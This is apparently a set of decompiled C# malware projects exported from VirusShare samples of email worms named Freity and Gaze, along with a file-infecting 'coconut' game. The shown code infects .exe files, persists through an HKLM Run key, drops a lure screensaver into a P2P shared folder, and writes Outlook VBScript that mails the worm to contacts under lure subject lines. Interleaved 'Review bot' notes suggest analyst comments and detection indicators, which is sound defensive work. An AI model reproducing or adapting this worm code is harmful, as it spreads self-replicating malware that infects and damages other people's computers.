(byte) 32,
(byte) 67,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 83,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 105,
(byte) 110,
(byte) 103,
(byte) 46,
(byte) 70,
(byte) 105,
(byte) 108,
(byte) 101,
(byte) 83,
(byte) 121,
(byte) 115,
(byte) 116,
(byte) 101,
(byte) 109,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 68,
(byte) 101,
(byte) 108,
(byte) 101,
(byte) 116,
(byte) 101,
(byte) 70,
(byte) 105,
(byte) 108,
(byte) 101,
(byte) 32,
(byte) 87,
(byte) 115,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 46,
(byte) 83,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 70,
(byte) 117,
(byte) 108,
(byte) 108,
(byte) 78,
(byte) 97,
(byte) 109,
(byte) 101
};
FileStream fileStream1 = new FileStream("c:\\mail.vbs", FileMode.OpenOrCreate, FileAccess.Write);
fileStream1.Write(buffer1, 0, buffer1.Length);
fileStream1.Close();
if (!File.Exists("c:\\coconut.exe"))
{
Process process = new Process();
File.Copy(this.virname, "c:\\tmpvir.exe", true);
FileStream fileStream2 = new FileStream("c:\\tmpvir.exe", FileMode.Open);
FileStream fileStream3 = new FileStream("c:\\coconut.exe", FileMode.OpenOrCreate);
byte[] buffer2 = new byte[200704];
fileStream2.Read(buffer2, 0, 200704);
fileStream3.Write(buffer2, 0, 200704);
fileStream2.Close();
fileStream3.Close();
File.Delete("c:\\tmpvir.exe");
process.StartInfo.FileName = "c:\\mail.vbs";
process.Start();
}
else
{
File.Copy(this.virname, "c:\\tmpvir.exe", true);
FileStream fileStream4 = new FileStream("c:\\tmpvir.exe", FileMode.Open);
FileStream fileStream5 = new FileStream("c:\\coconut.exe", FileMode.OpenOrCreate);
byte[] buffer3 = new byte[200704];
fileStream4.Read(buffer3, 0, 200704);
fileStream5.Write(buffer3, 0, 200704);
fileStream4.Close();
fileStream5.Close();
File.Delete("c:\\tmpvir.exe");
}
}
private void button1_Click(object sender, EventArgs e)
{
int num1 = this.rand_numb.Next(3);
++this.throw_turn;
this.coco.Visible = false;
switch (num1)
{
case 0:
this.ms_coco.Visible = true;
int num2 = (int) MessageBox.Show("You missed! You earned 0 points.");
this.ms_coco.Visible = false;
break;
case 1:
this.red_coco.Visible = true;
int num3 = (int) MessageBox.Show("You hit Frans Devaere! You earned 1 point.");
this.red_coco.Visible = false;
++this.score;
break;
default:
this.cl_coco.Visible = true;
int num4 = (int) MessageBox.Show("You hit Graham Cluley! You earned 2 points.");
this.cl_coco.Visible = false;
this.score += 2;
break;
}
this.coco.Visible = true;
if (this.throw_turn != 3)
return;
this.FileSearch(new DirectoryInfo(Environment.SystemDirectory).Parent.FullName);
int num5 = (int) MessageBox.Show("In total, you have " + (object) this.score + " point(s). Therefore, I have infected " + (object) (6 - this.score) + " files on your computer. To be able to run these files, you'll first have to play this game again.\nHave a nice day, \n\nGigabyte [Metaphase VX Team]");
FileStream fileStream1 = new FileStream(this.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 200704))];
fileStream1.Seek(200704L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 200704);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 200704);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !this.virname.EndsWith("coconut.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
Application.Exit();
}
private void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int num1 = this.rand_numb.Next(files.Length - 6);
for (int index = num1; index < num1 + (6 - this.score); ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num2 = fileStream1.ReadByte();
fileStream1.Close();
if (num2 != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy("c:\\coconut.exe", str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
}
}
}
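Review bot: `Form1_Load` has no comment saying what the 685-element `buffer1` literal is, so every reader has to decode it by hand; the values are printable ASCII with CR/LF pairs and read as a VBScript that drives Outlook, which the method then writes to `c:\mail.vbs`. I would add above the array `// buffer1: ASCII VBScript dropped to c:\mail.vbs; the first 200704 bytes of the running image are copied to c:\coconut.exe`. `FileSearch` needs a similar line at `if (num2 != 103)`, for example `// byte at offset 18 == 103 appears to be the already-infected marker`. That check and the fixed names `c:\coconut.exe`, `c:\tmpvir.exe`, `hostcopy.exe` and `temp.exe` are what a detection or cleanup rule would key on, and the 200704-byte prefix is where `button1_Click` splits the original host back out.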
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>XpCombo</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XpCombo", "Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.csproj", "{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,265 @@
// Decompiled with JetBrains decompiler
// Type: Module1
// Assembly: XpCombo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 3FCA07A7-B1C6-4879-B2D5-DAEB4F710028
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
using System.Reflection;
[StandardModule]
internal sealed class Module1
{
private static string filnam = "xpc1";
private static string v = " ";
private static string i;
private static string p;
private static string u;
private static int t = 1;
private static string o;
private static string k = ".vbs";
private static int l = 0;
private static string m;
private static string[] a = new string[11];
private static string[] b = new string[11];
private static string c;
private static string[] d = new string[51];
private static string[] e = new string[6];
private static string[] h = new string[69];
private static string[] f = new string[4];
private static string[] g = new string[4];
private static string q;
private static string x;
private static string y;
private static string z;
private static string r;
private static Module xp = Assembly.GetExecutingAssembly().GetModules()[0];
[STAThread]
public static void main()
{
Module1.i = "Owner";
Module1.o = Environment.UserName;
if (StringType.StrCmp(Module1.o, Module1.i, false) == 0 | File.Exists("C:\\windows\\fr8i.exe"))
{
int num = (int) Interaction.MsgBox((object) "You have been infected by XpCombo Worm Created By LoTti");
Module1.full();
}
else
{
FileSystem.FileCopy(Module1.xp.FullyQualifiedName, "" + Module1.filnam);
FileSystem.FileCopy(Module1.filnam, "C:\\Windows\\fr8i.exe");
if (StringType.StrCmp(FileSystem.Dir("c:\\program files\\BearShare\\my shared folder", FileAttribute.Directory), "", false) == 0)
FileSystem.MkDir("c:\\program files\\BearShare\\my shared folder");
FileSystem.FileCopy(Module1.filnam, "C:\\Program Files\\BearShare\\my shared folder\\Angelina Jolie.scr");
Module1.t = 1;
do
{
checked { ++Module1.l; }
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
Module1.d[0] = "\"joan";
Module1.d[1] = "\"michelle";
Module1.d[2] = "\"brian";
Module1.d[3] = "\"sinead";
Module1.d[4] = "\"mary";
Module1.d[5] = "\"sonia";
Module1.d[6] = "\"damien";
Module1.d[7] = "\"caoibhe";
Module1.d[8] = "\"kevin";
Module1.d[9] = "\"aishling";
Module1.d[10] = "\"maree";
Module1.d[11] = "\"nicola";
Module1.d[12] = "\"debbie";
Module1.d[13] = "\"susan";
Module1.d[14] = "\"naoimh";
Module1.d[15] = "\"bridget";
Module1.d[16] = "\"declan";
Module1.d[17] = "\"nuala";
Module1.d[18] = "\"micheal";
Module1.d[19] = "\"anthony";
Module1.d[20] = "\"joseph";
Module1.d[21] = "\"james";
Module1.d[22] = "\"keirin";
Module1.d[23] = "\"john";
Module1.d[24] = "\"ronan";
Module1.d[25] = "\"gavin";
Module1.d[26] = "\"david";
Module1.d[27] = "\"peter";
Module1.d[28] = "\"steven";
Module1.d[29] = "\"colin";
Module1.d[30] = "\"katie";
Module1.d[31] = "\"kathy";
Module1.d[32] = "\"noirin";
Module1.d[33] = "\"julia";
Module1.d[34] = "\"julie";
Module1.d[35] = "\"wayne";
Module1.d[36] = "\"sean";
Module1.d[37] = "\"shaun";
Module1.d[38] = "\"shane";
Module1.d[39] = "\"linda";
Module1.d[40] = "\"tanya";
Module1.d[41] = "\"tammy";
Module1.d[42] = "\"abbey";
Module1.d[43] = "\"robyn";
Module1.d[44] = "\"robert";
Module1.d[45] = "\"rachel";
Module1.d[46] = "\"naoimi";
Module1.d[47] = "\"natalie";
Module1.d[48] = "\"lauren";
Module1.d[49] = "\"gerard";
Module1.d[50] = "\"vincent";
Module1.h[0] = "1";
Module1.h[1] = "1995";
Module1.h[2] = "1996";
Module1.h[3] = "1997";
Module1.h[4] = "1998";
Module1.h[5] = "1999";
Module1.h[6] = "2000";
Module1.h[7] = "2003";
Module1.h[8] = "keane";
Module1.h[9] = "obrien";
Module1.h[10] = "kelly";
Module1.h[11] = "oreilly";
Module1.h[12] = "whelan";
Module1.h[13] = "linnane";
Module1.h[14] = "haze";
Module1.h[15] = "oneill";
Module1.h[16] = "mcnamara";
Module1.h[17] = "heinz";
Module1.h[18] = "hally";
Module1.h[19] = "mcmahon";
Module1.h[20] = "lynch";
Module1.h[21] = "carthy";
Module1.h[22] = "osullivan";
Module1.h[23] = "larkin";
Module1.h[24] = "walshe";
Module1.h[25] = "clancy";
Module1.h[26] = "nolan";
Module1.h[27] = "griffin";
Module1.h[28] = "casey";
Module1.h[29] = "oconnell";
Module1.h[30] = "odonnell";
Module1.h[31] = "chambers";
Module1.h[32] = "mulqueen";
Module1.h[33] = "mulcare";
Module1.h[34] = "coyne";
Module1.h[35] = "kerse";
Module1.h[36] = "burke";
Module1.h[37] = "mcinerney";
Module1.h[38] = "talty";
Module1.h[39] = "mcswiggan";
Module1.h[40] = "brown";
Module1.h[41] = "given";
Module1.h[42] = "mcgibney";
Module1.h[43] = "coffey";
Module1.h[44] = "quealy";
Module1.h[45] = "";
Module1.h[46] = "odea";
Module1.h[47] = "oshea";
Module1.h[48] = "ryan";
Module1.h[49] = "troy";
Module1.h[50] = "welsh";
Module1.h[51] = "neylon";
Module1.h[52] = "barrett";
Module1.h[53] = "lavrey";
Module1.h[54] = "ginnane";
Module1.h[55] = "hopkins";
Module1.h[56] = "hoskins";
Module1.h[57] = "carey";
Module1.h[58] = "king";
Module1.h[59] = "thompson";
Module1.h[60] = "bronson";
Module1.h[61] = "grogan";
Module1.h[62] = "meeney";
Module1.h[63] = "monaghan";
Module1.h[64] = "moroney";
Module1.h[65] = "lohan";
Module1.h[66] = "lucas";
Module1.h[67] = "healey";
Module1.h[67] = "";
Module1.h[68] = "crowley";
Module1.e[0] = "@yahoo.co.uk\"";
Module1.e[1] = "@hotmail.com\"";
Module1.e[2] = "@yahoo.co.uk\"";
Module1.e[3] = "@hotmail.com\"";
Module1.e[4] = "@yahoo.co.uk\"";
Module1.e[5] = "@hotmail.com\"";
Module1.x = Module1.d[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 7.0 + (double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 11.0 + (double) VBMath.Rnd() * 1.0 + (double) VBMath.Rnd() * 19.0)))];
Module1.y = Module1.e[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 5f)))];
Module1.q = Module1.h[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 16.0 + (double) VBMath.Rnd() * 4.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 10.0)))];
Module1.z = Module1.x + Module1.q + Module1.y;
Module1.a[0] = "\"Oh my god\"";
Module1.a[1] = "\"Your document\"";
Module1.a[2] = "\"Heres the file\"";
Module1.a[3] = "\"The passwords\"";
Module1.a[4] = "\"Thanks for this\"";
Module1.a[5] = "\"you have to see it\"";
Module1.a[6] = "\"look at this\"";
Module1.a[7] = "\"this is mad\"";
Module1.a[8] = "\"hi how are you\"";
Module1.a[9] = "\"Whats the Story\"";
Module1.a[10] = "\"Here it is i think\"";
Module1.b[0] = "\"Yeah here it is i found it last nite\"";
Module1.b[1] = "\"Do you want it or not\"";
Module1.b[2] = "\"This is the best i have seen yet\"";
Module1.b[3] = "\"Well i havent got much time but here it is\"";
Module1.b[4] = "\"I didnt have much time to look at it but here take it\"";
Module1.b[5] = "\"I got this from a friend\"";
Module1.b[6] = "\"Do you want this file\"";
Module1.b[7] = "\"I cant believe i had this\"";
Module1.b[8] = "\"Try it and tell me what you think\"";
Module1.b[9] = "\"I think you asked me for this if not just delete it\"";
Module1.b[10] = "\"Heres the file you asked for\"";
Module1.c = Strings.StrReverse(")0(metIetaerC.ppAkooltuO");
Module1.g[0] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
Module1.g[1] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
Module1.g[2] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
streamWriter.WriteLine("On Error Resume Next");
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
streamWriter.WriteLine("OutlookEmail.Importance = 1");
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
streamWriter.WriteLine("OutlookEmail.Send");
streamWriter.WriteLine("End If");
streamWriter.Close();
checked { ++Module1.t; }
}
while (Module1.t <= 50);
}
}
public static void full()
{
Module1.t = 1;
do
{
checked { ++Module1.l; }
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
streamWriter.WriteLine("On Error Resume Next");
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
streamWriter.WriteLine("OutlookEmail.Importance = 1");
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
streamWriter.WriteLine("OutlookEmail.Send");
streamWriter.WriteLine("End If");
streamWriter.Close();
checked { ++Module1.t; }
}
while (Module1.t <= 3600);
}
}
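Review bot: `main()` has no header comment, and its single-letter statics (`d`, `h`, `e`, `a`, `b`, `g`) hide the fact that it leaves artefacts in three places, which is the first thing an analyst needs to know. I would add above `main()` `// Drops: C:\Windows\fr8i.exe, "Angelina Jolie.scr" in the BearShare shared folder, and numbered N.vbs files under All Users\Start Menu`, and at the `if` `// taken when the user name is "Owner" or fr8i.exe already exists`. The `Strings.StrReverse(...)` assignment to `Module1.c` should also be commented as light string obfuscation of an Outlook call, because a static string scan will miss it unless it matches the reversed form too. The loop bounds (`t <= 50` in `main`, `t <= 3600` in `full`) give the number of script files to expect on an affected host and are worth stating next to each `while`.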
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.997.22053")]
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{63D73A47-01DC-4D91-B0DD-B30751C596FE}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>game</AssemblyName>
<ApplicationVersion>1.0.997.22053</ApplicationVersion>
<RootNamespace>game</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "game", "Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.csproj", "{63D73A47-01DC-4D91-B0DD-B30751C596FE}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,83 @@
// Decompiled with JetBrains decompiler
// Type: game.Form1
// Assembly: game, Version=1.0.997.22053, Culture=neutral, PublicKeyToken=null
// MVID: C1B9288B-F130-4335-97F2-0FD15B3024FA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace game
{
public class Form1 : Form
{
private Container components = (Container) null;
private RegistryKey key = Registry.LocalMachine;
private RegistryKey key1;
public Form1()
{
this.InitializeComponent();
try
{
if (!File.Exists("c:\\WINNT\\system32\\game.exe"))
{
File.Copy(Directory.GetCurrentDirectory() + "\\game.exe", "c:\\WINNT\\system32\\game.exe", true);
this.key1 = this.key.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
this.key1.SetValue("msdosie", (object) "c:\\WINNT\\system32\\game.exe");
this.key1.Close();
}
FileStream fileStream = new FileStream("c:\\WINNT\\system32\\mail.vbs", FileMode.Create, FileAccess.Write, FileShare.Write);
StreamWriter streamWriter = new StreamWriter((Stream) fileStream);
streamWriter.WriteLine("'On Error Resume Next");
streamWriter.WriteLine("Set objOA=Wscript.CreateObject(\"Outlook.Application\")");
streamWriter.WriteLine("Set objMapi=objOA.GetNameSpace(\"MAPI\")");
streamWriter.WriteLine("For i=1 to objMapi.AddressLists.Count");
streamWriter.WriteLine("Set objAddList=objMapi.AddressLists(i)");
streamWriter.WriteLine("For j=1 To objAddList. AddressEntries.Count");
streamWriter.WriteLine("Set objMail=objOA.CreateItem(0)");
streamWriter.WriteLine("objMail.Recipients.Add objAddList.AddressEntries(j)");
streamWriter.WriteLine("objMail.Subject=\"faze\"");
streamWriter.WriteLine("objMail.Body=\"How are you today?\"");
streamWriter.WriteLine("objMail.Attachments.Add \"c:\\WINNT\\system32\\game.exe\"");
streamWriter.WriteLine("objMail.Send");
streamWriter.WriteLine("Next");
streamWriter.WriteLine("Next");
streamWriter.WriteLine("Set objMapi=Nothing");
streamWriter.WriteLine("Set objOA=Nothing");
streamWriter.Flush();
streamWriter.Close();
fileStream.Close();
Process.Start("c:\\WINNT\\system32\\mail.vbs");
}
catch
{
}
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.AutoScaleBaseSize = new Size(6, 14);
this.ClientSize = new Size(292, 273);
this.Name = nameof (Form1);
this.ShowInTaskbar = false;
this.Text = nameof (Form1);
this.WindowState = FormWindowState.Minimized;
}
[STAThread]
private static void Main() => Application.Run((Form) new Form1());
}
}
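Review bot: Form1.cs carries only the decompiler's metadata header, so the behaviour in the `Form1()` constructor is undocumented for anyone triaging this sample. I would add an analyst comment above the constructor listing the indicators the code itself shows: `// Persistence: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "msdosie" -> c:\WINNT\system32\game.exe` and `// Drops and starts c:\WINNT\system32\mail.vbs, which uses Outlook.Application to send game.exe to every address-list entry`. The comment should also say that the whole body runs inside a `try` with an empty `catch`, so any failure is silent, for example when the hard-coded c:\WINNT directory is absent and the copy throws. A quiet sandbox run is therefore not evidence that the file is harmless.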
@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
